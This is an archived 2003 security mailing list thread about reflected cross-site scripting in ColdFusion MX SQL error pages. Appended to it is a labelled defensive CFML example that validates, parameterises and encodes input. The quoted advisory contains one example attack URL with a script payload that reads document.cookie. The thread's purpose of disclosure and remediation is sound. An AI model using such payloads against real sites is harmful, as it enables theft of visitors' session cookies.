Open Source and information security mailing list archives
 
Message-ID: <7A626FF425518246801C933014AA98F0063D15@hou-ex01.ihtx.iland.com>
Date: Wed, 15 Oct 2003 16:26:36 -0500
From: "Keith Kikta - iLand Internet Solutions Corp." <keith.kikta@...nd.com>
To: "Full-Disclosure" <full-disclosure@...ts.netsys.com>
Cc: "BUGTRAQ" <bugtraq@...urityfocus.com>
Subject: RE: ColdFusion SQL Error Pages XSS



The code should check the value of "id".
Like :

<cfif isnumeric(ID)>
	Proceed 
<cfelse>
	Custom Error...
</cfif> 

This has always been in ColdFusion. It is desired functionality. Whether or not the coder wanted this to happen is his/her problem, not Macromedia's.

-----Original Message-----
From: Lorenzo Hernandez Garcia-Hierro
[mailto:lorenzohgh@...g-security.com]
Sent: Wednesday, October 15, 2003 3:37 PM
To: Full-Disclosure
Cc: BUGTRAQ
Subject: ColdFusion SQL Error Pages XSS


----------
NOTE ABOUT COLDFUSION XSS ATTACKS
_______
Vendor: Macromedia
Versions: MX ( 6.0 ) tested , older ?
_______

PROBLEM:
When you access an SQL error page you can insert XSS code to be shown
in the error output of the SQL backend.
example:
http://[target]/article.cfm?id=1'<script>alert(document.cookie);</script>
the output:
Error Occurred While Processing Request
      Error Diagnostic Information
      [SQL SERVER] Error Code = code

      SQL SERVER-XXXX: SQL command not properly ended



      SQL = "SELECT article AS articleID FROM articlesnews WHERE newsID =
1'[HERE COMES THE XSS THAT IS EXECUTED]

      Data Source = "XXXXXXXXXXXXXXXXXXXXXX"


      The error occurred while processing an element with a general
identifier of (CFQUERY), occupying document position (7:2) to (7:58) in the
template file /xxxxxxxxxxxxxxxxxxxx/articles.cfm.


      Date/Time: Moof 2003
      Browser: Browserio

      Remote Address: xxx.xxx.xxx.xxx

      Query String: id=1'[again executed the xss attack]




Please inform the site administrator that this error has occurred (be sure
to include the contents of this page in your message to the administrator).

-----
CONTACT INFO:
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453  7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
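
Added example, not part of either message and not Macromedia's code: one way to write the article.cfm lookup so that the id is validated, bound as a query parameter, and never echoed back in an error page. The datasource name "articles_dsn" and the log file name "article_errors" are hypothetical; the table and column names come from the error output quoted above.

```cfml
<!--- article.cfm: added example. The datasource name "articles_dsn" and
      the log file name are hypothetical placeholders; table and column
      names are taken from the error output quoted in the message above. --->
<cfparam name="URL.id" default="">

<!--- 1. Validate: accept only a short run of digits. isNumeric() would also
      accept values such as 1.5, so an integer key gets the stricter test. --->
<cfif NOT REFind("^[0-9]{1,9}$", URL.id)>
	<cfheader statuscode="400" statustext="Bad Request">
	<cfoutput><p>Invalid article id.</p></cfoutput>
	<cfabort>
</cfif>

<cftry>
	<!--- 2. Bind the value instead of concatenating it into the SQL text. --->
	<cfquery name="getArticle" datasource="articles_dsn">
		SELECT article AS articleID
		FROM articlesnews
		WHERE newsID = <cfqueryparam cfsqltype="cf_sql_integer" value="#URL.id#">
	</cfquery>

	<cfcatch type="database">
		<!--- 3. Log the detail server-side; the visitor gets a fixed message
		      with no SQL text or query string echoed back. --->
		<cflog file="article_errors" type="error"
		       text="#cfcatch.message# | id=#URL.id#">
		<cfheader statuscode="500" statustext="Internal Server Error">
		<cfoutput><p>The article could not be loaded.</p></cfoutput>
		<cfabort>
	</cfcatch>
</cftry>

<cfoutput query="getArticle">
	<!--- 4. Encode anything that reaches HTML. --->
	<p>#HTMLEditFormat(getArticle.articleID)#</p>
</cfoutput>
```

The validation alone stops this particular request, but the catch block is what keeps the detailed diagnostic page from being shown for database errors that validation does not anticipate.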

